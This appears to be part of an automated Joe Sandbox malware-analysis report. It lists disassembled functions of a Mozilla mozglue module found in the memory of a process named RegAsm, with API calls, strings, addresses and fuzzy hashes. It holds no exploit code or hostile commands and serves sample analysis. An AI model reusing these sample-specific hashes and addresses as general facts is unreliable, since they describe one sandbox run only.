                                                                                    • Opcode ID: 53095b8788664e025618167f9bcbd9265cc314b6b056cd1e28a5fac97584f750
                                                                                    • Instruction ID: 31c4608101abf0d07ce37f85feb279c64ac3d35e6fea8f9d9c544b32f4f706c8
                                                                                    • Opcode Fuzzy Hash: 53095b8788664e025618167f9bcbd9265cc314b6b056cd1e28a5fac97584f750
                                                                                    • Instruction Fuzzy Hash: C151B7C2B4563552FA003115AF1ABAA14C9EF6324BF10653AED0EA5F81FF05A709C7B7
                                                                                    Function 6C6D47C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C6D4801
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6D4817
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6D482D
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D484A
                                                                                      • Part of subcall function 6C6FAB3F: EnterCriticalSection.KERNEL32(6C74E370,?,?,6C6C3527,6C74F6CC,?,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB49
                                                                                      • Part of subcall function 6C6FAB3F: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C3527,6C74F6CC,?,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FAB7C
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6D485F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6D487E
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C6D488B
                                                                                    • free.MOZGLUE(?), ref: 6C6D493A
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6D4956
                                                                                    • free.MOZGLUE(00000000), ref: 6C6D4960
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C6D499A
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • free.MOZGLUE(?), ref: 6C6D49C6
                                                                                    • free.MOZGLUE(?), ref: 6C6D49E9
                                                                                      • Part of subcall function 6C6E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6E5EDB
                                                                                      • Part of subcall function 6C6E5E90: memset.VCRUNTIME140(ewrl,000000E5,?), ref: 6C6E5F27
                                                                                      • Part of subcall function 6C6E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6E5FB2
                                                                                    Strings
                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6D4812
                                                                                    • [I %d/%d] profiler_shutdown, xrefs: 6C6D4A06
                                                                                    • MOZ_PROFILER_SHUTDOWN, xrefs: 6C6D4A42
                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C6D47FC
                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6D4828
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                    • API String ID: 1340022502-4194431170
                                                                                    • Opcode ID: ad0b4b3d6168c3186188860c642f186b9e4dcdc12963ea7a7d178e9b6b41471d
                                                                                    • Instruction ID: 34cb2f9e5bfd66266ffebeaac43d7a461001645a0b9f35dc99f50823b5b36623
                                                                                    • Opcode Fuzzy Hash: ad0b4b3d6168c3186188860c642f186b9e4dcdc12963ea7a7d178e9b6b41471d
                                                                                    • Instruction Fuzzy Hash: 2A811670A001008BDB10EF68C88477A3775AF4232DF1A4276D9269BB45EB71FD55CB9E
                                                                                    Function 6C6D4470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6D4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6D44B2,6C74E21C,6C74F7F8), ref: 6C6D473E
                                                                                      • Part of subcall function 6C6D4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C6D474A
                                                                                    • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6D44BA
                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6D44D2
                                                                                    • InitOnceExecuteOnce.KERNEL32(6C74F80C,6C6CF240,?,?), ref: 6C6D451A
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C6D455C
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 6C6D4592
                                                                                    • InitializeCriticalSection.KERNEL32(6C74F770), ref: 6C6D45A2
                                                                                    • moz_xmalloc.MOZGLUE(00000008), ref: 6C6D45AA
                                                                                    • moz_xmalloc.MOZGLUE(00000018), ref: 6C6D45BB
                                                                                    • InitOnceExecuteOnce.KERNEL32(6C74F818,6C6CF240,?,?), ref: 6C6D4612
                                                                                    • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C6D4636
                                                                                    • LoadLibraryW.KERNEL32(user32.dll), ref: 6C6D4644
                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C6D466D
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D469F
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D46AB
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D46B2
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D46B9
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D46C0
                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6D46CD
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C6D46F1
                                                                                    • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6D46FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                    • String ID: Gtl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                    • API String ID: 1702738223-2699975829
                                                                                    • Opcode ID: 6224c9dde0a50449480b0c7c234a495bf436586915b878d6f4fbefeb62b304d2
                                                                                    • Instruction ID: 6bfd29d05e12145b989d783e756c73c1d71e52b37bd63ef7bc0dfeb858bafee0
                                                                                    • Opcode Fuzzy Hash: 6224c9dde0a50449480b0c7c234a495bf436586915b878d6f4fbefeb62b304d2
                                                                                    • Instruction Fuzzy Hash: DA6125B0604348AFEB11AF61CD09BA97BBCEB4630CF05C16AE5089B641D7B4AE44CF95
                                                                                    Function 6C6D19A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F760), ref: 6C6D19BD
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6D19E5
                                                                                    • GetLastError.KERNEL32 ref: 6C6D1A27
                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C6D1A41
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6D1A4F
                                                                                    • GetLastError.KERNEL32 ref: 6C6D1A92
                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C6D1AAC
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6D1ABA
                                                                                    • LocalFree.KERNEL32(?), ref: 6C6D1C69
                                                                                    • free.MOZGLUE(?), ref: 6C6D1C8F
                                                                                    • free.MOZGLUE(?), ref: 6C6D1C9D
                                                                                    • CloseHandle.KERNEL32(?), ref: 6C6D1CAE
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F760), ref: 6C6D1D52
                                                                                    • GetLastError.KERNEL32 ref: 6C6D1DA5
                                                                                    • GetLastError.KERNEL32 ref: 6C6D1DFB
                                                                                    • GetLastError.KERNEL32 ref: 6C6D1E49
                                                                                    • GetLastError.KERNEL32 ref: 6C6D1E68
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6D1E9B
                                                                                      • Part of subcall function 6C6D2070: LoadLibraryW.KERNEL32(combase.dll,6C6D1C5F), ref: 6C6D20AE
                                                                                      • Part of subcall function 6C6D2070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C6D20CD
                                                                                      • Part of subcall function 6C6D2070: __Init_thread_footer.LIBCMT ref: 6C6D20E1
                                                                                    • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6D1F15
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D1F46
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D1F52
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D1F59
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D1F60
                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C6D1F6D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
                                                                                    • String ID: D
                                                                                    • API String ID: 290179723-2746444292
                                                                                    • Opcode ID: 17f3c33dab42415bbbdfb477c059f26955a2a9a5b17e38e85e8603fb0c094f26
                                                                                    • Instruction ID: 990afd724dedc342e17163a4ffac8814940ef43b4b81dace2166a29c3f405f3a
                                                                                    • Opcode Fuzzy Hash: 17f3c33dab42415bbbdfb477c059f26955a2a9a5b17e38e85e8603fb0c094f26
                                                                                    • Instruction Fuzzy Hash: 93F1B471E003259FEB209F65CD48B9AB7B8FF49728F1141A5E909A7640D7B4ED80CF94
                                                                                    Function 6C70E8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C707090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C70B9F1,?), ref: 6C707107
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C70DCF5), ref: 6C70E92D
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EA4F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EA5C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EA80
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EA8A
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C70DCF5), ref: 6C70EA92
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EB11
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EB1E
                                                                                    • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C70EB3C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EB5B
                                                                                      • Part of subcall function 6C705710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C70EB71), ref: 6C7057AB
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EBA4
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C70EBAC
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EBC1
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8,?,?,00000000), ref: 6C70EBCE
                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C70EBE5
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8,00000000), ref: 6C70EC37
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C70EC46
                                                                                    • CloseHandle.KERNEL32(?), ref: 6C70EC55
                                                                                    • free.MOZGLUE(00000000), ref: 6C70EC5C
                                                                                    Strings
                                                                                    • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C70EA9B
                                                                                    • [I %d/%d] profiler_start, xrefs: 6C70EBB4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                                    • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                    • API String ID: 1341148965-1186885292
                                                                                    • Opcode ID: 6ace64b440ac9f633860b10a581aa05a5259fd787950e6decd676a36b63236b7
                                                                                    • Instruction ID: 855644a0e6f366e2b15fe12feb5339e60e91d038fad626cf316d9eb8d0746846
                                                                                    • Opcode Fuzzy Hash: 6ace64b440ac9f633860b10a581aa05a5259fd787950e6decd676a36b63236b7
                                                                                    • Instruction Fuzzy Hash: 0CA117B17006049FDB10AF68D548BAA77F5FF8631CF14813BE96987B41DB70A805CBA5
                                                                                    Function 6C70F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F70E
                                                                                    • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C70F8F9
                                                                                      • Part of subcall function 6C6D6390: GetCurrentThreadId.KERNEL32 ref: 6C6D63D0
                                                                                      • Part of subcall function 6C6D6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C6D63DF
                                                                                      • Part of subcall function 6C6D6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C6D640E
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F93A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F98A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F990
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F994
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F716
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                      • Part of subcall function 6C6CB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C6CB5E0
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F739
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F746
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F793
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C74385B,00000002,?,?,?,?,?), ref: 6C70F829
                                                                                    • free.MOZGLUE(?,?,00000000,?), ref: 6C70F84C
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C70F866
                                                                                    • free.MOZGLUE(?), ref: 6C70FA0C
                                                                                      • Part of subcall function 6C6D5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6D55E1), ref: 6C6D5E8C
                                                                                      • Part of subcall function 6C6D5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D5E9D
                                                                                      • Part of subcall function 6C6D5E60: GetCurrentThreadId.KERNEL32 ref: 6C6D5EAB
                                                                                      • Part of subcall function 6C6D5E60: GetCurrentThreadId.KERNEL32 ref: 6C6D5EB8
                                                                                      • Part of subcall function 6C6D5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D5ECF
                                                                                      • Part of subcall function 6C6D5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C6D5F27
                                                                                      • Part of subcall function 6C6D5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C6D5F47
                                                                                      • Part of subcall function 6C6D5E60: GetCurrentProcess.KERNEL32 ref: 6C6D5F53
                                                                                      • Part of subcall function 6C6D5E60: GetCurrentThread.KERNEL32 ref: 6C6D5F5C
                                                                                      • Part of subcall function 6C6D5E60: GetCurrentProcess.KERNEL32 ref: 6C6D5F66
                                                                                      • Part of subcall function 6C6D5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C6D5F7E
                                                                                    • free.MOZGLUE(?), ref: 6C70F9C5
                                                                                    • free.MOZGLUE(?), ref: 6C70F9DA
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C70F9A6
                                                                                    • Thread , xrefs: 6C70F789
                                                                                    • [D %d/%d] profiler_register_thread(%s), xrefs: 6C70F71F
                                                                                    • " attempted to re-register as ", xrefs: 6C70F858
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                    • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                    • API String ID: 882766088-1834255612
                                                                                    • Opcode ID: 433fb69097314bc99f721e138520af1369668aee352ef0cc74fb178ced46b59a
                                                                                    • Instruction ID: 78fb8ae6f771886e61713990ec24cd5d158ab946f5c6be9935a5c2dab0ca88ab
                                                                                    • Opcode Fuzzy Hash: 433fb69097314bc99f721e138520af1369668aee352ef0cc74fb178ced46b59a
                                                                                    • Instruction Fuzzy Hash: 688116B16047009FD700DF24C944AAEB7E5FFC6308F41856EE85997751EB30A909CBAA
                                                                                    Function 6C70EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EE60
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EE6D
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EE92
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C70EEA5
                                                                                    • CloseHandle.KERNEL32(?), ref: 6C70EEB4
                                                                                    • free.MOZGLUE(00000000), ref: 6C70EEBB
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EEC7
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70EECF
                                                                                      • Part of subcall function 6C70DE60: GetCurrentThreadId.KERNEL32 ref: 6C70DE73
                                                                                      • Part of subcall function 6C70DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C6D4A68), ref: 6C70DE7B
                                                                                      • Part of subcall function 6C70DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C6D4A68), ref: 6C70DEB8
                                                                                      • Part of subcall function 6C70DE60: free.MOZGLUE(00000000,?,6C6D4A68), ref: 6C70DEFE
                                                                                      • Part of subcall function 6C70DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C70DF38
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EF1E
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EF2B
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EF59
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EFB0
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EFBD
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EFE1
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EFF8
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F000
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C70F02F
                                                                                      • Part of subcall function 6C70F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C70F09B
                                                                                      • Part of subcall function 6C70F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C70F0AC
                                                                                      • Part of subcall function 6C70F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C70F0BE
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_stop, xrefs: 6C70EED7
                                                                                    • [I %d/%d] profiler_pause, xrefs: 6C70F008
                                                                                    Memory Dump Source
